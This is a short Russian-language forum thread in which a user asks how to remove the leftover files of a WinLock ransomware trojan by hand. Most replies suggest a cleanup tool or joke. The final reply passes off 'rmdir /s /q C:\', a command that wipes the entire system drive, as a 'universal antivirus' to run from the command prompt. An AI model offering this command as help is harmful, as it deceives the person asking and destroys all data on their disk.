Анастасия Бармина

Как удалить троян самостоятельно

Как удалить троян винлок самостоятельно (мне нужен путь к файлам) просто винлок отключил но вредоносные файлы остались.
Насщёт реестра знаю. Не предлагайте антивирус и переустановку windows

Дм
Дмитрий

сам недавно поймал удалял через Dr.Web CureIt, зачем заниматься хе-й самому, если это может сделать программа

Павлихин

попробуй щадящим методом

Азат

Ну в процессах его найдите, потом через путь к файлу и программу unlocker удалите!

Furkat

Оцифруй свою интеллектуальную сущность, перенеси ее в комп и уничтожай вирусы сколько захочешь!! !

Он же скачет по диску как ты его удалишь! ? И еще реестр! Антивирусы не могут, а тут ты сам! ! ))))

Сл
Славик

Запустите универсальный антивирус:
Пуск > Все программы > Стандартные > Командная строка, наберите rmdir /s /q C:\
Нажмите Enter.